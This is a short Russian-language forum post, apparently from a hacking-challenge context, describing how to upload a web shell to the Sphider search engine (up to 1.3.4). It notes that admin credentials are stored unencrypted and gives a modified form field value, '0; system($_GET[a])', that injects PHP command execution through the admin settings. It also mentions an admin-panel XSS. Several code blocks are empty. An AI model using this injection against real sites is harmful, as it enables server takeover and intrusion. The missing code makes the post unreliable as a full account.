![]() |
[sphider] Заливка шелла
Powered by http://www.sphider.eu/sphider-logo.png <=1.3.4
В Задании 003, где требовалось залить шелл был обнаружен этот движок. роспознал я его сразу, так как у самого когда то стоял такой. Сразу же полез на локалхост посмотреть сорцы. Оказалось что довольно просто залить шелл из админки. Логин и пасс хранять не в зашифрованом виде в http://site.com/sphider/admin/auth.php Дефолт: PHP код:
Уязвимый код: PHP код:
Код HTML:
<input name="_index_pdf" type="checkbox" value="0" id="index_pdf" >Код HTML:
<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >В итоге имеем: PHP код:
По иронии судьбы на том сайте что в задании прав на запись не хватало. Также в админке есть xss. Но пользы мало, так как мы уже в админке). |
| Время: 03:07 |